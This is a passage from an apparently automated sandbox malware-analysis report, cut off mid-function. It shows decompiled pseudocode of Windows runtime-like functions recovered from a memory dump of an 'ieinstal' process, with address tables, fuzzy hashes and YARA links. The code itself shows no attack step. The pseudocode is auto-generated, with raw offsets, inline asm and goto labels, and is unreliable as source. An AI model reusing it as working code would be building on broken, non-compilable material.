                        0x1edcaf3d
                        0x1edcaf41
                        0x1edcaf44
                        0x1edcaf67
                        0x1edcaf67
                        0x1edcaf6a
                        0x1edcafca
                        0x1edcafd1
                        0x00000000
                        0x1edcafd1
                        0x1edcaf6c
                        0x1edcaf6d
                        0x1edcaf75
                        0x1edcaf7c
                        0x1edcaf7e
                        0x1edcaf80
                        0x1edcaf85
                        0x1edcaf87
                        0x1edcaf99
                        0x1edcaf89
                        0x1edcaf92
                        0x1edcaf92
                        0x1edcaf9e
                        0x1edcafa1
                        0x1edcafa3
                        0x1edcafa9
                        0x1edcafb0
                        0x1edcafb2
                        0x1edcafb4
                        0x1edcafbc
                        0x1edcafbc
                        0x1edcafb4
                        0x1edcafb0
                        0x00000000
                        0x1edcafa1
                        0x1edcaf4f
                        0x1edcaf57
                        0x1edcaf5c
                        0x1edcaf5e
                        0x00000000
                        0x00000000
                        0x1edcaf60
                        0x1edcaf64
                        0x1edcaf64
                        0x00000000
                        0x1edcaf64
                        0x1edcaf1a
                        0x1edcaf25
                        0x00000000
                        0x00000000
                        0x1edcaf27
                        0x1edcaf28
                        0x1edcaf33
                        0x00000000
                        0x1edcaed0
                        0x1edcaed0
                        0x1edcaed2
                        0x1edcaee1
                        0x1edcaee4
                        0x00000000
                        0x00000000
                        0x1edcaee6
                        0x1edcaeec
                        0x00000000
                        0x00000000
                        0x1edcaefb
                        0x1edcaf07
                        0x1edcafd3
                        0x1edcafdb
                        0x1edcafdb
                        0x00000000
                        0x1edcaf07
                        0x1edcaed6
                        0x1edcaed8
                        0x1edcaedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edcaedf
                        0x1edcaec9

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24b556e469c4852631edfeff9458afa2ae026a8e6d43d044fbf6cb2acfb684b1
                        • Instruction ID: ad39505f7280eb4a2b80e7f808aa4af83c9c1a2d383d7877a5c8c0417a5a595d
                        • Opcode Fuzzy Hash: 24b556e469c4852631edfeff9458afa2ae026a8e6d43d044fbf6cb2acfb684b1
                        • Instruction Fuzzy Hash: B941C7B1B006519BD716CB25C8A4B6FB79AEF886A0F01471DF857C72D0DB74E842C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2DBE9, Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E1ED2DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E1ED0CC50(E1ED04510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E1ED27D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E1EDD8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E1ED22280(_t58, _v44);
						E1ED2DD82(_v44, _t102, _t98);
						E1ED2B944(_t102, _v5);
						return E1ED1FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1edf8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x1edf862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1edf8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x1edf862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x1edcfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                        0x1ed2dbe9
                        0x1ed2dbf2
                        0x1ed2dbf7
                        0x1ed2dbf9
                        0x1ed2dbfc
                        0x1ed2dc00
                        0x1ed2dc03
                        0x1ed2dc14
                        0x1ed2dd54
                        0x1ed2dd54
                        0x1ed2dd54
                        0x1ed2dc18
                        0x1ed2dc1d
                        0x1ed2dc1d
                        0x1ed2dc32
                        0x1ed2dc3b
                        0x1ed2dc3e
                        0x1ed2dc46
                        0x1ed2dd5b
                        0x1ed2dd62
                        0x1ed2dd64
                        0x1ed2dd67
                        0x1ed2dd69
                        0x1ed2dd6b
                        0x1ed2dd6e
                        0x1ed2dd70
                        0x1ed2dd73
                        0x1ed2dd73
                        0x00000000
                        0x1ed2dc4c
                        0x1ed2dc4e
                        0x1ed73ae3
                        0x1ed73ae8
                        0x1ed73aea
                        0x1ed2dce7
                        0x1ed2dce9
                        0x1ed2dcec
                        0x1ed2dcee
                        0x1ed2dcf0
                        0x1ed2dcf3
                        0x1ed2dcf5
                        0x1ed73af2
                        0x1ed73af5
                        0x1ed73af5
                        0x1ed2dd06
                        0x1ed2dd08
                        0x1ed2dd0b
                        0x1ed2dd12
                        0x1ed73b08
                        0x1ed2dd18
                        0x1ed2dd18
                        0x1ed2dd18
                        0x1ed2dd20
                        0x1ed2dd23
                        0x1ed73b16
                        0x1ed73b16
                        0x1ed2dd29
                        0x1ed2dd2d
                        0x1ed2dd36
                        0x1ed2dd40
                        0x1ed2dd51
                        0x1ed2dd51
                        0x1ed2dc54
                        0x1ed2dc59
                        0x1ed2dc59
                        0x1ed2dc5e
                        0x1ed2dc5e
                        0x1ed2dc63
                        0x1ed2dc66
                        0x1ed2dc6b
                        0x1ed2dc78
                        0x1ed2dc7b
                        0x1ed2dc81
                        0x1ed2dc81
                        0x1ed2dc83
                        0x1ed2dc89
                        0x00000000
                        0x00000000
                        0x1ed2dd7b
                        0x1ed2dd7b
                        0x1ed2dc8f
                        0x1ed2dc8f
                        0x1ed2dc92
                        0x1ed2dc99
                        0x1ed2dc9f
                        0x1ed2dca5
                        0x1ed2dcaa
                        0x1ed2dcaa
                        0x1ed2dcb3
                        0x1ed2dcb8
                        0x1ed2dcbb
                        0x1ed2dcc1
                        0x1ed2dccf
                        0x1ed2dcd2
                        0x1ed2dcd5
                        0x1ed2dcd7
                        0x1ed2dcda
                        0x1ed2dcdc
                        0x1ed2dcdc
                        0x1ed2dce2
                        0x1ed2dce4
                        0x00000000
                        0x1ed2dce4

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f36729a71c4e913fe9eeb8c13669743390541e09b2e986afd20ce17eef6c9c1e
                        • Instruction ID: 5d314daf8b9fc18ce8c3fb19a6c5251c675693a4d02eb927e6fb17a9ef9725c8
                        • Opcode Fuzzy Hash: f36729a71c4e913fe9eeb8c13669743390541e09b2e986afd20ce17eef6c9c1e
                        • Instruction Fuzzy Hash: DB51BE75A00656CFCB04CF68C490A8EFBF2BF48314F24866AD995A7344DB71E945CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1EF40, Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1ED1EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E1ED09080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E1ED02D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                        0x1ed1ef4b
                        0x1ed1ef4d
                        0x1ed1ef57
                        0x1ed1f0bd
                        0x1ed1f0c2
                        0x1ed1f0d2
                        0x1ed1f0d2
                        0x1ed1f0c2
                        0x1ed1ef5d
                        0x1ed1ef5f
                        0x1ed1ef67
                        0x1ed1ef6a
                        0x1ed1ef6d
                        0x1ed1ef74
                        0x1ed1ef7f
                        0x1ed1ef82
                        0x1ed1ef82
                        0x1ed1ef86
                        0x1ed1ef88
                        0x1ed1ef8c
                        0x1ed1ef8f
                        0x1ed1ef8f
                        0x1ed1ef8f
                        0x00000000
                        0x1ed1ef91
                        0x1ed1ef93
                        0x1ed1efc4
                        0x1ed1efc4
                        0x1ed1efc4
                        0x1ed1efca
                        0x1ed1efd0
                        0x1ed1f0a6
                        0x00000000
                        0x00000000
                        0x1ed1f0af
                        0x1ed6bb06
                        0x1ed6bb0a
                        0x1ed1f0b5
                        0x1ed1f0b5
                        0x1ed1f0b5
                        0x1ed1f0b5
                        0x00000000
                        0x1ed1efd6
                        0x1ed1efd9
                        0x1ed1f0de
                        0x1ed1f0e2
                        0x1ed1efdf
                        0x1ed1efdf
                        0x1ed1efdf
                        0x1ed1efe5
                        0x1ed6bafc
                        0x1ed6bafc
                        0x1ed1efe5
                        0x1ed1efeb
                        0x1ed1efed
                        0x1ed1f00f
                        0x1ed1f011
                        0x1ed1f01a
                        0x1ed1f01d
                        0x1ed1f021
                        0x1ed1f028
                        0x1ed1f029
                        0x1ed1f029
                        0x1ed1f02c
                        0x00000000
                        0x1ed1f02c
                        0x1ed1eff3
                        0x1ed1eff9
                        0x1ed1f0ea
                        0x1ed1f0ed
                        0x1ed1f0ef
                        0x00000000
                        0x1ed1f0ef
                        0x1ed1f003
                        0x1ed6bb12
                        0x1ed1f045
                        0x1ed1f049
                        0x1ed1f051
                        0x1ed1f09e
                        0x1ed1f0a0
                        0x1ed1f0a0
                        0x1ed1f09e
                        0x1ed1f053
                        0x1ed1f064
                        0x1ed1f064
                        0x1ed1f06b
                        0x1ed6bb1a
                        0x1ed6bb1a
                        0x1ed1f071
                        0x1ed1f071
                        0x1ed1f07d
                        0x1ed1f082
                        0x1ed1f08f
                        0x1ed1f08f
                        0x1ed1f009
                        0x1ed1f00d
                        0x00000000
                        0x1ed1f00d
                        0x1ed1efd0
                        0x1ed1ef97
                        0x1ed1efa5
                        0x1ed1efaa
                        0x00000000
                        0x1ed1efac
                        0x1ed1efac
                        0x1ed1efac
                        0x00000000
                        0x1ed1efb2
                        0x1ed1f036
                        0x1ed1f03a
                        0x1ed1f040
                        0x1ed1f090
                        0x00000000
                        0x1ed1f092
                        0x1ed1f042
                        0x00000000
                        0x1ed1f042
                        0x1ed1efb7
                        0x1ed1efb9
                        0x1ed1efbc
                        0x1ed1efb0
                        0x1ed1efb0
                        0x00000000
                        0x1ed1efbe
                        0x1ed1efbe
                        0x1ed1efc1
                        0x00000000
                        0x1ed1efc1
                        0x1ed1efbc
                        0x1ed1efaa
                        0x1ed1ef91

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 0d4543471f87c59e8e2bd5b2fde813d010e22c08657c908649ff28122b1945cb
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 5851C230E1428ADFDB00CB69E190B9EBBB2AF55314F1483ADE9855B281C375E9C9C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD740D, Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E1EDD740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E1ED5D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E1ED4F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E1ED4F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L1ED24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                        0x1edd740d
                        0x1edd740d
                        0x1edd7412
                        0x1edd7413
                        0x1edd7416
                        0x1edd7418
                        0x1edd741c
                        0x1edd741f
                        0x1edd7422
                        0x1edd7422
                        0x1edd7428
                        0x1edd742a
                        0x1edd742a
                        0x1edd7451
                        0x1edd7432
                        0x1edd744f
                        0x1edd744f
                        0x00000000
                        0x1edd7434
                        0x1edd7438
                        0x1edd7443
                        0x1edd7517
                        0x1edd7517
                        0x1edd751a
                        0x1edd7535
                        0x1edd7520
                        0x1edd7527
                        0x1edd752c
                        0x1edd7531
                        0x1edd7533
                        0x00000000
                        0x1edd7533
                        0x00000000
                        0x1edd7531
                        0x1edd754b
                        0x1edd754f
                        0x1edd755c
                        0x1edd755c
                        0x1edd755f
                        0x1edd7560
                        0x1edd7561
                        0x1edd7562
                        0x1edd7563
                        0x1edd7568
                        0x1edd756a
                        0x1edd756c
                        0x1edd756d
                        0x1edd756d
                        0x1edd756f
                        0x1edd7572
                        0x1edd7574
                        0x1edd7577
                        0x1edd757c
                        0x1edd757f
                        0x00000000
                        0x1edd7551
                        0x1edd7551
                        0x1edd7551
                        0x1edd7553
                        0x1edd7553
                        0x1edd7449
                        0x1edd7449
                        0x1edd744c
                        0x1edd744c
                        0x00000000
                        0x1edd744c
                        0x1edd7443
                        0x1edd750e
                        0x1edd7514
                        0x1edd7514
                        0x1edd7455
                        0x1edd7469
                        0x1edd746d
                        0x00000000
                        0x1edd7473
                        0x1edd7473
                        0x1edd7476
                        0x1edd7480
                        0x1edd7484
                        0x1edd748e
                        0x1edd7493
                        0x1edd7493
                        0x1edd7496
                        0x1edd7499
                        0x1edd74a1
                        0x1edd74b1
                        0x1edd74b5
                        0x00000000
                        0x1edd74bb
                        0x1edd74c1
                        0x1edd74c1
                        0x1edd74c4
                        0x1edd74c5
                        0x1edd74c6
                        0x1edd74c7
                        0x1edd74c8
                        0x1edd74cd
                        0x00000000
                        0x1edd74d3
                        0x1edd74d3
                        0x1edd74d6
                        0x1edd74d8
                        0x1edd74db
                        0x1edd74dd
                        0x1edd74e0
                        0x1edd74e7
                        0x1edd74ee
                        0x1edd74ee
                        0x1edd74f4
                        0x1edd74f9
                        0x00000000
                        0x1edd74fb
                        0x1edd74fb
                        0x1edd74fd
                        0x1edd7500
                        0x1edd7503
                        0x1edd7505
                        0x1edd7505
                        0x1edd74f9
                        0x00000000
                        0x1edd74cd
                        0x1edd74b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 2a767ba80dc0718fbb3b1cca1cdafbdb457b363ada3c7a5eb6446308154e2052
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: E5517071600686DFCB16CF54C480A86BBB5FF45305F16C6FAE9089F295E371E949CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED32990, Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E1ED32990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x1eddff00);
				E1ED5D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1ece1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E1ED4E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1ece1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E1ED851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1ece166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E1ED32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E1ED16600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
